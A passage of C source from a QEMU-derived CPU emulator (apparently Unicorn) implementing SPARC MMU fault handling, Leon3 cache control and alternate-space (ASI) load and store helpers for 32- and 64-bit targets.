addr, asi, r1 & 0xffff); break; case 4: DPRINTF_ASI("%s "TARGET_FMT_lx " asi 0x%02x = %08" PRIx64 "\n", txt, addr, asi, r1 & 0xffffffff); break; case 8: DPRINTF_ASI("%s "TARGET_FMT_lx " asi 0x%02x = %016" PRIx64 "\n", txt, addr, asi, r1); break; } } #endif #ifndef TARGET_SPARC64 static void sparc_raise_mmu_fault(CPUState *cs, hwaddr addr, bool is_write, bool is_exec, int is_asi, unsigned size, uintptr_t retaddr) { SPARCCPU *cpu = SPARC_CPU(cs); CPUSPARCState *env = &cpu->env; int fault_type; #ifdef DEBUG_UNASSIGNED if (is_asi) { printf("Unassigned mem %s access of %d byte%s to " TARGET_FMT_plx " asi 0x%02x from " TARGET_FMT_lx "\n", is_exec ? "exec" : is_write ? "write" : "read", size, size == 1 ? "" : "s", addr, is_asi, env->pc); } else { printf("Unassigned mem %s access of %d byte%s to " TARGET_FMT_plx " from " TARGET_FMT_lx "\n", is_exec ? "exec" : is_write ? "write" : "read", size, size == 1 ? "" : "s", addr, env->pc); } #endif /* Don't overwrite translation and access faults */ fault_type = (env->mmuregs[3] & 0x1c) >> 2; if ((fault_type > 4) || (fault_type == 0)) { env->mmuregs[3] = 0; /* Fault status register */ if (is_asi) { env->mmuregs[3] |= 1 << 16; } if (env->psrs) { env->mmuregs[3] |= 1 << 5; } if (is_exec) { env->mmuregs[3] |= 1 << 6; } if (is_write) { env->mmuregs[3] |= 1 << 7; } env->mmuregs[3] |= (5 << 2) | 2; /* SuperSPARC will never place instruction fault addresses in the FAR */ if (!is_exec) { env->mmuregs[4] = addr; /* Fault address register */ } } /* overflow (same type fault was not read before another fault) */ if (fault_type == ((env->mmuregs[3] & 0x1c)) >> 2) { env->mmuregs[3] |= 1; } if ((env->mmuregs[0] & MMU_E) && !(env->mmuregs[0] & MMU_NF)) { int tt = is_exec ? TT_CODE_ACCESS : TT_DATA_ACCESS; cpu_raise_exception_ra(env, tt, retaddr); } /* * flush neverland mappings created during no-fault mode, * so the sequential MMU faults report proper fault types */ if (env->mmuregs[0] & MMU_NF) { tlb_flush(cs); } } #else static void sparc_raise_mmu_fault(CPUState *cs, hwaddr addr, bool is_write, bool is_exec, int is_asi, unsigned size, uintptr_t retaddr) { SPARCCPU *cpu = SPARC_CPU(cs); CPUSPARCState *env = &cpu->env; #ifdef DEBUG_UNASSIGNED printf("Unassigned mem access to " TARGET_FMT_plx " from " TARGET_FMT_lx "\n", addr, env->pc); #endif if (is_exec) { /* XXX has_hypervisor */ if (env->lsu & (IMMU_E)) { cpu_raise_exception_ra(env, TT_CODE_ACCESS, retaddr); } else if (cpu_has_hypervisor(env) && !(env->hpstate & HS_PRIV)) { cpu_raise_exception_ra(env, TT_INSN_REAL_TRANSLATION_MISS, retaddr); } } else { if (env->lsu & (DMMU_E)) { cpu_raise_exception_ra(env, TT_DATA_ACCESS, retaddr); } else if (cpu_has_hypervisor(env) && !(env->hpstate & HS_PRIV)) { cpu_raise_exception_ra(env, TT_DATA_REAL_TRANSLATION_MISS, retaddr); } } } #endif #ifndef TARGET_SPARC64 /* Leon3 cache control */ static void leon3_cache_control_st(CPUSPARCState *env, target_ulong addr, uint64_t val, int size) { DPRINTF_CACHE_CONTROL("st addr:%08x, val:%" PRIx64 ", size:%d\n", addr, val, size); if (size != 4) { DPRINTF_CACHE_CONTROL("32bits only\n"); return; } switch (addr) { case 0x00: /* Cache control */ /* These values must always be read as zeros */ val &= ~CACHE_CTRL_FD; val &= ~CACHE_CTRL_FI; val &= ~CACHE_CTRL_IB; val &= ~CACHE_CTRL_IP; val &= ~CACHE_CTRL_DP; env->cache_control = val; break; case 0x04: /* Instruction cache configuration */ case 0x08: /* Data cache configuration */ /* Read Only */ break; default: DPRINTF_CACHE_CONTROL("write unknown register %08x\n", addr); break; }; } static uint64_t leon3_cache_control_ld(CPUSPARCState *env, target_ulong addr, int size) { uint64_t ret = 0; if (size != 4) { DPRINTF_CACHE_CONTROL("32bits only\n"); return 0; } switch (addr) { case 0x00: /* Cache control */ ret = env->cache_control; break; /* Configuration registers are read and only always keep those predefined values */ case 0x04: /* Instruction cache configuration */ ret = 0x10220000; break; case 0x08: /* Data cache configuration */ ret = 0x18220000; break; default: DPRINTF_CACHE_CONTROL("read unknown register %08x\n", addr); break; }; DPRINTF_CACHE_CONTROL("ld addr:%08x, ret:0x%" PRIx64 ", size:%d\n", addr, ret, size); return ret; } uint64_t helper_ld_asi(CPUSPARCState *env, target_ulong addr, int asi, uint32_t memop) { int size = 1 << (memop & MO_SIZE); int sign = memop & MO_SIGN; CPUState *cs = env_cpu(env); uint64_t ret = 0; #if defined(DEBUG_MXCC) || defined(DEBUG_ASI) uint32_t last_addr = addr; #endif do_check_align(env, addr, size - 1, GETPC()); switch (asi) { case ASI_M_MXCC: /* SuperSparc MXCC registers, or... */ /* case ASI_LEON_CACHEREGS: Leon3 cache control */ switch (addr) { case 0x00: /* Leon3 Cache Control */ case 0x08: /* Leon3 Instruction Cache config */ case 0x0C: /* Leon3 Date Cache config */ if (env->def.features & CPU_FEATURE_CACHE_CTRL) { ret = leon3_cache_control_ld(env, addr, size); } break; case 0x01c00a00: /* MXCC control register */ if (size == 8) { ret = env->mxccregs[3]; } else { qemu_log_mask(LOG_UNIMP, "%08x: unimplemented access size: %d\n", addr, size); } break; case 0x01c00a04: /* MXCC control register */ if (size == 4) { ret = env->mxccregs[3]; } else { qemu_log_mask(LOG_UNIMP, "%08x: unimplemented access size: %d\n", addr, size); } break; case 0x01c00c00: /* Module reset register */ if (size == 8) { ret = env->mxccregs[5]; /* should we do something here? */ } else { qemu_log_mask(LOG_UNIMP, "%08x: unimplemented access size: %d\n", addr, size); } break; case 0x01c00f00: /* MBus port address register */ if (size == 8) { ret = env->mxccregs[7]; } else { qemu_log_mask(LOG_UNIMP, "%08x: unimplemented access size: %d\n", addr, size); } break; default: qemu_log_mask(LOG_UNIMP, "%08x: unimplemented address, size: %d\n", addr, size); break; } DPRINTF_MXCC("asi = %d, size = %d, sign = %d, " "addr = %08x -> ret = %" PRIx64 "," "addr = %08x\n", asi, size, sign, last_addr, ret, addr); #ifdef DEBUG_MXCC dump_mxcc(env); #endif break; case ASI_M_FLUSH_PROBE: /* SuperSparc MMU probe */ case ASI_LEON_MMUFLUSH: /* LEON3 MMU probe */ { int mmulev; mmulev = (addr >> 8) & 15; if (mmulev > 4) { ret = 0; } else { ret = mmu_probe(env, addr, mmulev); } DPRINTF_MMU("mmu_probe: 0x%08x (lev %d) -> 0x%08" PRIx64 "\n", addr, mmulev, ret); } break; case ASI_M_MMUREGS: /* SuperSparc MMU regs */ case ASI_LEON_MMUREGS: /* LEON3 MMU regs */ { int reg = (addr >> 8) & 0x1f; ret = env->mmuregs[reg]; if (reg == 3) { /* Fault status cleared on read */ env->mmuregs[3] = 0; } else if (reg == 0x13) { /* Fault status read */ ret = env->mmuregs[3]; } else if (reg == 0x14) { /* Fault address read */ ret = env->mmuregs[4]; } DPRINTF_MMU("mmu_read: reg[%d] = 0x%08" PRIx64 "\n", reg, ret); } break; case ASI_M_TLBDIAG: /* Turbosparc ITLB Diagnostic */ case ASI_M_DIAGS: /* Turbosparc DTLB Diagnostic */ case ASI_M_IODIAG: /* Turbosparc IOTLB Diagnostic */ break; case ASI_KERNELTXT: /* Supervisor code access */ switch (size) { case 1: ret = cpu_ldub_code(env, addr); break; case 2: ret = cpu_lduw_code(env, addr); break; default: case 4: ret = cpu_ldl_code(env, addr); break; case 8: ret = cpu_ldq_code(env, addr); break; } break; case ASI_M_TXTC_TAG: /* SparcStation 5 I-cache tag */ case ASI_M_TXTC_DATA: /* SparcStation 5 I-cache data */ case ASI_M_DATAC_TAG: /* SparcStation 5 D-cache tag */ case ASI_M_DATAC_DATA: /* SparcStation 5 D-cache data */ break; case 0x21: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x22: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x23: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x24: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x25: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x26: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x27: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x28: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x29: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x2a: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x2b: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x2c: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x2d: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x2e: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x2f: /* MMU passthrough, 0x100000000 to 0xfffffffff */ { MemTxResult result; hwaddr access_addr = (hwaddr)addr | ((hwaddr)(asi & 0xf) << 32); switch (size) { case 1: ret = glue(address_space_ldub, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, access_addr, MEMTXATTRS_UNSPECIFIED, &result); break; case 2: ret = glue(address_space_lduw, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, access_addr, MEMTXATTRS_UNSPECIFIED, &result); break; default: case 4: ret = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, access_addr, MEMTXATTRS_UNSPECIFIED, &result); break; case 8: ret = glue(address_space_ldq, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, access_addr, MEMTXATTRS_UNSPECIFIED, &result); break; } if (result != MEMTX_OK) { sparc_raise_mmu_fault(cs, access_addr, false, false, false, size, GETPC()); } break; } case 0x30: /* Turbosparc secondary cache diagnostic */ case 0x31: /* Turbosparc RAM snoop */ case 0x32: /* Turbosparc page table descriptor diagnostic */ case 0x39: /* data cache diagnostic register */ ret = 0; break; case 0x38: /* SuperSPARC MMU Breakpoint Control Registers */ { int reg = (addr >> 8) & 3; switch (reg) { case 0: /* Breakpoint Value (Addr) */ ret = env->mmubpregs[reg]; break; case 1: /* Breakpoint Mask */ ret = env->mmubpregs[reg]; break; case 2: /* Breakpoint Control */ ret = env->mmubpregs[reg]; break; case 3: /* Breakpoint Status */ ret = env->mmubpregs[reg]; env->mmubpregs[reg] = 0ULL; break; } DPRINTF_MMU("read breakpoint reg[%d] 0x%016" PRIx64 "\n", reg, ret); } break; case 0x49: /* SuperSPARC MMU Counter Breakpoint Value */ ret = env->mmubpctrv; break; case 0x4a: /* SuperSPARC MMU Counter Breakpoint Control */ ret = env->mmubpctrc; break; case 0x4b: /* SuperSPARC MMU Counter Breakpoint Status */ ret = env->mmubpctrs; break; case 0x4c: /* SuperSPARC MMU Breakpoint Action */ ret = env->mmubpaction; break; case ASI_USERTXT: /* User code access, XXX */ default: sparc_raise_mmu_fault(cs, addr, false, false, asi, size, GETPC()); ret = 0; break; case ASI_USERDATA: /* User data access */ case ASI_KERNELDATA: /* Supervisor data access */ case ASI_P: /* Implicit primary context data access (v9 only?) */ case ASI_M_BYPASS: /* MMU passthrough */ case ASI_LEON_BYPASS: /* LEON MMU passthrough */ /* These are always handled inline. */ g_assert_not_reached(); } if (sign) { switch (size) { case 1: ret = (int8_t) ret; break; case 2: ret = (int16_t) ret; break; case 4: ret = (int32_t) ret; break; default: break; } } #ifdef DEBUG_ASI dump_asi("read ", last_addr, asi, size, ret); #endif return ret; } void helper_st_asi(CPUSPARCState *env, target_ulong addr, uint64_t val, int asi, uint32_t memop) { int size = 1 << (memop & MO_SIZE); CPUState *cs = env_cpu(env); do_check_align(env, addr, size - 1, GETPC()); switch (asi) { case ASI_M_MXCC: /* SuperSparc MXCC registers, or... */ /* case ASI_LEON_CACHEREGS: Leon3 cache control */ switch (addr) { case 0x00: /* Leon3 Cache Control */ case 0x08: /* Leon3 Instruction Cache config */ case 0x0C: /* Leon3 Date Cache config */ if (env->def.features & CPU_FEATURE_CACHE_CTRL) { leon3_cache_control_st(env, addr, val, size); } break; case 0x01c00000: /* MXCC stream data register 0 */ if (size == 8) { env->mxccdata[0] = val; } else { qemu_log_mask(LOG_UNIMP, "%08x: unimplemented access size: %d\n", addr, size); } break; case 0x01c00008: /* MXCC stream data register 1 */ if (size == 8) { env->mxccdata[1] = val; } else { qemu_log_mask(LOG_UNIMP, "%08x: unimplemented access size: %d\n", addr, size); } break; case 0x01c00010: /* MXCC stream data register 2 */ if (size == 8) { env->mxccdata[2] = val; } else { qemu_log_mask(LOG_UNIMP, "%08x: unimplemented access size: %d\n", addr, size); } break; case 0x01c00018: /* MXCC stream data register 3 */ if (size == 8) { env->mxccdata[3] = val; } else { qemu_log_mask(LOG_UNIMP, "%08x: unimplemented access size: %d\n", addr, size); } break; case 0x01c00100: /* MXCC stream source */ { int i; if (size == 8) { env->mxccregs[0] = val; } else { qemu_log_mask(LOG_UNIMP, "%08x: unimplemented access size: %d\n", addr, size); } for (i = 0; i < 4; i++) { MemTxResult result; hwaddr access_addr = (env->mxccregs[0] & 0xffffffffULL) + 8 * i; env->mxccdata[i] = glue(address_space_ldq, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, access_addr, MEMTXATTRS_UNSPECIFIED, &result); if (result != MEMTX_OK) { /* TODO: investigate whether this is the right behaviour */ sparc_raise_mmu_fault(cs, access_addr, false, false, false, size, GETPC()); } } break; } case 0x01c00200: /* MXCC stream destination */ { int i; if (size == 8) { env->mxccregs[1] = val; } else { qemu_log_mask(LOG_UNIMP, "%08x: unimplemented access size: %d\n", addr, size); } for (i = 0; i < 4; i++) { MemTxResult result; hwaddr access_addr = (env->mxccregs[1] & 0xffffffffULL) + 8 * i; glue(address_space_stq, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, access_addr, env->mxccdata[i], MEMTXATTRS_UNSPECIFIED, &result); if (result != MEMTX_OK) { /* TODO: investigate whether this is the right behaviour */ sparc_raise_mmu_fault(cs, access_addr, true, false, false, size, GETPC()); } } break; } case 0x01c00a00: /* MXCC control register */ if (size == 8) { env->mxccregs[3] = val; } else { qemu_log_mask(LOG_UNIMP, "%08x: unimplemented access size: %d\n", addr, size); } break; case 0x01c00a04: /* MXCC control register */ if (size == 4) { env->mxccregs[3] = (env->mxccregs[3] & 0xffffffff00000000ULL) | val; } else { qemu_log_mask(LOG_UNIMP, "%08x: unimplemented access size: %d\n", addr, size); } break; case 0x01c00e00: /* MXCC error register */ /* writing a 1 bit clears the error */ if (size == 8) { env->mxccregs[6] &= ~val; } else { qemu_log_mask(LOG_UNIMP, "%08x: unimplemented access size: %d\n", addr, size); } break; case 0x01c00f00: /* MBus port address register */ if (size == 8) { env->mxccregs[7] = val; } else { qemu_log_mask(LOG_UNIMP, "%08x: unimplemented access size: %d\n", addr, size); } break; default: qemu_log_mask(LOG_UNIMP, "%08x: unimplemented address, size: %d\n", addr, size); break; } DPRINTF_MXCC("asi = %d, size = %d, addr = %08x, val = %" PRIx64 "\n", asi, size, addr, val); #ifdef DEBUG_MXCC dump_mxcc(env); #endif break; case ASI_M_FLUSH_PROBE: /* SuperSparc MMU flush */ case ASI_LEON_MMUFLUSH: /* LEON3 MMU flush */ { int mmulev; mmulev = (addr >> 8) & 15; DPRINTF_MMU("mmu flush level %d\n", mmulev); switch (mmulev) { case 0: /* flush page */ tlb_flush_page(cs, addr & 0xfffff000); break; case 1: /* flush segment (256k) */ case 2: /* flush region (16M) */ case 3: /* flush context (4G) */ case 4: /* flush entire */ tlb_flush(cs); break; default: break; } #ifdef DEBUG_MMU dump_mmu(env); #endif } break; case ASI_M_MMUREGS: /* write MMU regs */ case ASI_LEON_MMUREGS: /* LEON3 write MMU regs */ { int reg = (addr >> 8) & 0x1f; uint32_t oldreg; oldreg = env->mmuregs[reg]; switch (reg) { case 0: /* Control Register */ env->mmuregs[reg] = (env->mmuregs[reg] & 0xff000000) | (val & 0x00ffffff); /* Mappings generated during no-fault mode are invalid in normal mode. */ if ((oldreg ^ env->mmuregs[reg]) & (MMU_NF | env->def.mmu_bm)) { tlb_flush(cs); } break; case 1: /* Context Table Pointer Register */ env->mmuregs[reg] = val & env->def.mmu_ctpr_mask; break; case 2: /* Context Register */ env->mmuregs[reg] = val & env->def.mmu_cxr_mask; if (oldreg != env->mmuregs[reg]) { /* we flush when the MMU context changes because QEMU has no MMU context support */ tlb_flush(cs); } break; case 3: /* Synchronous Fault Status Register with Clear */ case 4: /* Synchronous Fault Address Register */ break; case 0x10: /* TLB Replacement Control Register */ env->mmuregs[reg] = val & env->def.mmu_trcr_mask; break; case 0x13: /* Synchronous Fault Status Register with Read and Clear */ env->mmuregs[3] = val & env->def.mmu_sfsr_mask; break; case 0x14: /* Synchronous Fault Address Register */ env->mmuregs[4] = val; break; default: env->mmuregs[reg] = val; break; } if (oldreg != env->mmuregs[reg]) { DPRINTF_MMU("mmu change reg[%d]: 0x%08x -> 0x%08x\n", reg, oldreg, env->mmuregs[reg]); } #ifdef DEBUG_MMU dump_mmu(env); #endif } break; case ASI_M_TLBDIAG: /* Turbosparc ITLB Diagnostic */ case ASI_M_DIAGS: /* Turbosparc DTLB Diagnostic */ case ASI_M_IODIAG: /* Turbosparc IOTLB Diagnostic */ break; case ASI_M_TXTC_TAG: /* I-cache tag */ case ASI_M_TXTC_DATA: /* I-cache data */ case ASI_M_DATAC_TAG: /* D-cache tag */ case ASI_M_DATAC_DATA: /* D-cache data */ case ASI_M_FLUSH_PAGE: /* I/D-cache flush page */ case ASI_M_FLUSH_SEG: /* I/D-cache flush segment */ case ASI_M_FLUSH_REGION: /* I/D-cache flush region */ case ASI_M_FLUSH_CTX: /* I/D-cache flush context */ case ASI_M_FLUSH_USER: /* I/D-cache flush user */ break; case 0x21: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x22: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x23: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x24: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x25: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x26: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x27: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x28: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x29: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x2a: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x2b: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x2c: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x2d: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x2e: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x2f: /* MMU passthrough, 0x100000000 to 0xfffffffff */ { MemTxResult result; hwaddr access_addr = (hwaddr)addr | ((hwaddr)(asi & 0xf) << 32); switch (size) { case 1: glue(address_space_stb, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, access_addr, val, MEMTXATTRS_UNSPECIFIED, &result); break; case 2: glue(address_space_stw, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, access_addr, val, MEMTXATTRS_UNSPECIFIED, &result); break; case 4: default: glue(address_space_stl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, access_addr, val, MEMTXATTRS_UNSPECIFIED, &result); break; case 8: glue(address_space_stq, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, access_addr, val, MEMTXATTRS_UNSPECIFIED, &result); break; } if (result != MEMTX_OK) { sparc_raise_mmu_fault(cs, access_addr, true, false, false, size, GETPC()); } } break; case 0x30: /* store buffer tags or Turbosparc secondary cache diagnostic */ case 0x31: /* store buffer data, Ross RT620 I-cache flush or Turbosparc snoop RAM */ case 0x32: /* store buffer control or Turbosparc page table descriptor diagnostic */ case 0x36: /* I-cache flash clear */ case 0x37: /* D-cache flash clear */ break; case 0x38: /* SuperSPARC MMU Breakpoint Control Registers*/ { int reg = (addr >> 8) & 3; switch (reg) { case 0: /* Breakpoint Value (Addr) */ env->mmubpregs[reg] = (val & 0xfffffffffULL); break; case 1: /* Breakpoint Mask */ env->mmubpregs[reg] = (val & 0xfffffffffULL); break; case 2: /* Breakpoint Control */ env->mmubpregs[reg] = (val & 0x7fULL); break; case 3: /* Breakpoint Status */ env->mmubpregs[reg] = (val & 0xfULL); break; } DPRINTF_MMU("write breakpoint reg[%d] 0x%016x\n", reg, env->mmuregs[reg]); } break; case 0x49: /* SuperSPARC MMU Counter Breakpoint Value */ env->mmubpctrv = val & 0xffffffff; break; case 0x4a: /* SuperSPARC MMU Counter Breakpoint Control */ env->mmubpctrc = val & 0x3; break; case 0x4b: /* SuperSPARC MMU Counter Breakpoint Status */ env->mmubpctrs = val & 0x3; break; case 0x4c: /* SuperSPARC MMU Breakpoint Action */ env->mmubpaction = val & 0x1fff; break; case ASI_USERTXT: /* User code access, XXX */ case ASI_KERNELTXT: /* Supervisor code access, XXX */ default: sparc_raise_mmu_fault(cs, addr, true, false, asi, size, GETPC()); break; case ASI_USERDATA: /* User data access */ case ASI_KERNELDATA: /* Supervisor data access */ case ASI_P: case ASI_M_BYPASS: /* MMU passthrough */ case ASI_LEON_BYPASS: /* LEON MMU passthrough */ case ASI_M_BCOPY: /* Block copy, sta access */ case ASI_M_BFILL: /* Block fill, stda access */ /* These are always handled inline. */ g_assert_not_reached(); } #ifdef DEBUG_ASI dump_asi("write", addr, asi, size, val); #endif } #else /* TARGET_SPARC64 */ uint64_t helper_ld_asi(CPUSPARCState *env, target_ulong addr, int asi, uint32_t memop) { int size = 1 << (memop & MO_SIZE); int sign = memop & MO_SIGN; CPUState *cs = env_cpu(env); uint64_t ret = 0; #if defined(DEBUG_ASI) target_ulong last_addr = addr; #endif asi &= 0xff; do_check_asi(env, asi, GETPC()); do_check_align(env, addr, size - 1, GETPC()); addr = asi_address_mask(env, asi, addr); switch (asi) { case ASI_PNF: case ASI_PNFL: case ASI_SNF: case ASI_SNFL: { TCGMemOpIdx oi; int idx = (env->pstate & PS_PRIV ? (asi & 1 ? MMU_KERNEL_SECONDARY_IDX : MMU_KERNEL_IDX) : (asi & 1 ? MMU_USER_SECONDARY_IDX : MMU_USER_IDX)); #ifdef _MSC_VER if (cpu_get_phys_page_nofault(env, addr, idx) == 0xffffffffffffffffULL) { #else if (cpu_get_phys_page_nofault(env, addr, idx) == -1ULL) { #endif #ifdef DEBUG_ASI dump_asi("read ", last_addr, asi, size, ret); #endif /* exception_index is set in get_physical_address_data. */ cpu_raise_exception_ra(env, cs->exception_index, GETPC()); } oi = make_memop_idx(memop, idx); switch (size) { case 1: ret = helper_ret_ldub_mmu(env, addr, oi, GETPC()); break; case 2: if (asi & 8) { ret = helper_le_lduw_mmu(env, addr, oi, GETPC()); } else { ret = helper_be_lduw_mmu(env, addr, oi, GETPC()); } break; case 4: if (asi & 8) { ret = helper_le_ldul_mmu(env, addr, oi, GETPC()); } else { ret = helper_be_ldul_mmu(env, addr, oi, GETPC()); } break; case 8: if (asi & 8) { ret = helper_le_ldq_mmu(env, addr, oi, GETPC()); } else { ret = helper_be_ldq_mmu(env, addr, oi, GETPC()); } break; default: g_assert_not_reached(); } } break; case ASI_AIUP: /* As if user primary */ case ASI_AIUS: /* As if user secondary */ case ASI_AIUPL: /* As if user primary LE */ case ASI_AIUSL: /* As if user secondary LE */ case ASI_P: /* Primary */ case ASI_S: /* Secondary */ case ASI_PL: /* Primary LE */ case ASI_SL: /* Secondary LE */ case ASI_REAL: /* Bypass */ case ASI_REAL_IO: /* Bypass, non-cacheable */ case ASI_REAL_L: /* Bypass LE */ case ASI_REAL_IO_L: /* Bypass, non-cacheable LE */ case ASI_N: /* Nucleus */ case ASI_NL: /* Nucleus Little Endian (LE) */ case ASI_NUCLEUS_QUAD_LDD: /* Nucleus quad LDD 128 bit atomic */ case ASI_NUCLEUS_QUAD_LDD_L: /* Nucleus quad LDD 128 bit atomic LE */ case ASI_TWINX_AIUP: /* As if user primary, twinx */ case ASI_TWINX_AIUS: /* As if user secondary, twinx */ case ASI_TWINX_REAL: /* Real address, twinx */ case ASI_TWINX_AIUP_L: /* As if user primary, twinx, LE */ case ASI_TWINX_AIUS_L: /* As if user secondary, twinx, LE */ case ASI_TWINX_REAL_L: /* Real address, twinx, LE */ case ASI_TWINX_N: /* Nucleus, twinx */ case ASI_TWINX_NL: /* Nucleus, twinx, LE */ /* ??? From the UA2011 document; overlaps BLK_INIT_QUAD_LDD_* */ case ASI_TWINX_P: /* Primary, twinx */ case ASI_TWINX_PL: /* Primary, twinx, LE */ case ASI_TWINX_S: /* Secondary, twinx */ case ASI_TWINX_SL: /* Secondary, twinx, LE */ /* These are always handled inline. */ g_assert_not_reached(); case ASI_UPA_CONFIG: /* UPA config */ /* XXX */ break; case ASI_LSU_CONTROL: /* LSU */ ret = env->lsu; break; case ASI_IMMU: /* I-MMU regs */ { int reg = (addr >> 3) & 0xf; switch (reg) { case 0: /* 0x00 I-TSB Tag Target register */ ret = ultrasparc_tag_target(env->immu.tag_access); break; case 3: /* SFSR */ ret = env->immu.sfsr; break; case 5: /* TSB access */ ret = env->immu.tsb; break; case 6: /* 0x30 I-TSB Tag Access register */ ret = env->immu.tag_access; break; default: sparc_raise_mmu_fault(cs, addr, false, false, 1, size, GETPC()); ret = 0; } break; } case ASI_IMMU_TSB_8KB_PTR: /* I-MMU 8k TSB pointer */ { /* env->immuregs[5] holds I-MMU TSB register value env->immuregs[6] holds I-MMU Tag Access register value */ ret = ultrasparc_tsb_pointer(env, &env->immu, 0); break; } case ASI_IMMU_TSB_64KB_PTR: /* I-MMU 64k TSB pointer */ { /* env->immuregs[5] holds I-MMU TSB register value env->immuregs[6] holds I-MMU Tag Access register value */ ret = ultrasparc_tsb_pointer(env, &env->immu, 1); break; } case ASI_ITLB_DATA_ACCESS: /* I-MMU data access */ { int reg = (addr >> 3) & 0x3f; ret = env->itlb[reg].tte; break; } case ASI_ITLB_TAG_READ: /* I-MMU tag read */ { int reg = (addr >> 3) & 0x3f; ret = env->itlb[reg].tag; break; } case ASI_DMMU: /* D-MMU regs */ { int reg = (addr >> 3) & 0xf; switch (reg) { case 0: /* 0x00 D-TSB Tag Target register */ ret = ultrasparc_tag_target(env->dmmu.tag_access); break; case 1: /* 0x08 Primary Context */ ret = env->dmmu.mmu_primary_context; break; case 2: /* 0x10 Secondary Context */ ret = env->dmmu.mmu_secondary_context; break; case 3: /* SFSR */ ret = env->dmmu.sfsr; break; case 4: /* 0x20 SFAR */ ret = env->dmmu.sfar; break; case 5: /* 0x28 TSB access */ ret = env->dmmu.tsb; break; case 6: /* 0x30 D-TSB Tag Access register */ ret = env->dmmu.tag_access; break; case 7: ret = env->dmmu.virtual_watchpoint; break; case 8: ret = env->dmmu.physical_watchpoint; break; default: sparc_raise_mmu_fault(cs, addr, false, false, 1, size, GETPC()); ret = 0; } break; } case ASI_DMMU_TSB_8KB_PTR: /* D-MMU 8k TSB pointer */ { /* env->dmmuregs[5] holds D-MMU TSB register value env->dmmuregs[6] holds D-MMU Tag Access register value */ ret = ultrasparc_tsb_pointer(env, &env->dmmu, 0); break; } case ASI_DMMU_TSB_64KB_PTR: /* D-MMU 64k TSB pointer */ { /* env->dmmuregs[5] holds D-MMU TSB register value env->dmmuregs[6] holds D-MMU Tag Access register value */ ret = ultrasparc_tsb_pointer(env, &env->dmmu, 1); break; } case ASI_DTLB_DATA_ACCESS: /* D-MMU data access */ { int reg = (addr >> 3) & 0x3f; ret = env->dtlb[reg].tte; break; } case ASI_DTLB_TAG_READ: /* D-MMU tag read */ { int reg = (addr >> 3) & 0x3f; ret = env->dtlb[reg].tag; break; } case ASI_INTR_DISPATCH_STAT: /* Interrupt dispatch, RO */ break; case ASI_INTR_RECEIVE: /* Interrupt data receive */ ret = env->ivec_status; break; case ASI_INTR_R: /* Incoming interrupt vector, RO */ { int reg = (addr >> 4) & 0x3; if (reg < 3) { ret = env->ivec_data[reg]; } break; } case ASI_SCRATCHPAD: /* UA2005 privileged scratchpad */ if (unlikely((addr >= 0x20) && (addr < 0x30))) { /* Hyperprivileged access only */ sparc_raise_mmu_fault(cs, addr, false, false, 1, size, GETPC()); } /* fall through */ case ASI_HYP_SCRATCHPAD: /* UA2005 hyperprivileged scratchpad */ { unsigned int i = (addr >> 3) & 0x7; ret = env->scratch[i]; break; } case ASI_MMU: /* UA2005 Context ID registers */ switch ((addr >> 3) & 0x3) { case 1: ret = env->dmmu.mmu_primary_context; break; case 2: ret = env->dmmu.mmu_secondary_context; break; default: sparc_raise_mmu_fault(cs, addr, true, false, 1, size, GETPC()); } break; case ASI_DCACHE_DATA: /* D-cache data */ case ASI_DCACHE_TAG: /* D-cache tag access */ case ASI_ESTATE_ERROR_EN: /* E-cache error enable */ case ASI_AFSR: /* E-cache asynchronous fault status */ case ASI_AFAR: /* E-cache asynchronous fault address */ case ASI_EC_TAG_DATA: /* E-cache tag data */ case ASI_IC_INSTR: /* I-cache instruction access */ case ASI_IC_TAG: /* I-cache tag access */ case ASI_IC_PRE_DECODE: /* I-cache predecode */ case ASI_IC_NEXT_FIELD: /* I-cache LRU etc. */ case ASI_EC_W: /* E-cache tag */ case ASI_EC_R: /* E-cache tag */ break; case ASI_DMMU_TSB_DIRECT_PTR: /* D-MMU data pointer */ case ASI_ITLB_DATA_IN: /* I-MMU data in, WO */ case ASI_IMMU_DEMAP: /* I-MMU demap, WO */ case ASI_DTLB_DATA_IN: /* D-MMU data in, WO */ case ASI_DMMU_DEMAP: /* D-MMU demap, WO */ case ASI_INTR_W: /* Interrupt vector, WO */ default: sparc_raise_mmu_fault(cs, addr, false, false, 1, size, GETPC()); ret = 0; break; } /* Convert to signed number */ if 